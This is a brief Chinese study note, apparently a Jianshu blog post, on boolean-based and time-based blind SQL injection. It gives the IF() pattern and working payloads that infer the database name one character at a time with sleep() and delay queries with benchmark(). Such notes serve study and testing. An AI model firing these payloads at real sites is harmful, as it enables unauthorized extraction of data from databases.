布尔盲注&&时间盲注

条件:返回正确或者错误页面

image.png
if(EXPR,TRUEEXPR,FALSEEXPR)

time-based

if(ascii(substr((select database() limit 0,1),1,1))>97,sleep(3),0)
select benchmark(10000000,md5('a'))
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。